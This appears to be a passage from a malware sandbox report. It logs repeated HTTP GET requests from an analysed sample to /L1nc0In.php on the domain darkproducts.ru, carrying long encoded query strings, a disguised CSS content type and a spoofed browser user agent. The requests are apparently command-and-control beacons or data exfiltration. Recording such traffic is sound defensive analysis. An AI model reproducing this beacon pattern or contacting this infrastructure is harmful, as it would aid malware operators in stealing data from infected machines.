UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0dYlI1orS1H6xFOx8XSck9t=FZ&6f2f8138a6e862c9cc5a89afaa068eff=310dbed95ebf165903903d07e44ebdc0&c6a92fac9f4420a60e173afb34e4bea8=wMlZTNyYWZzUDZhN2NzczN4UDZlljY2YTN0MjZyUmNzcjNiRDO1YjY&0dYlI1orS1H6xFOx8XSck9t=FZ HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI5cDMmljY5gDOkFTMmBjYkZzMjdDOiRmZ0UDO5YWZiJzM5QWZ4YWZwIiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&1aa2aa90917c447227433aa68c631e46=QX9JSUmlWTYplbGdUVnl0VahlQTpVdsdkYtplMUNGexM2M5ckW1xmMWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI5cDMmljY5gDOkFTMmBjYkZzMjdDOiRmZ0UDO5YWZiJzM5QWZ4YWZwIiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 52952cm.darkproducts.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETp1ERPBTW65keJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiImFGMmVTN4EWM2MGZiZ2M2UzY5MmY0MmMmJzNkZmZkJWYwcjM0EDM0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 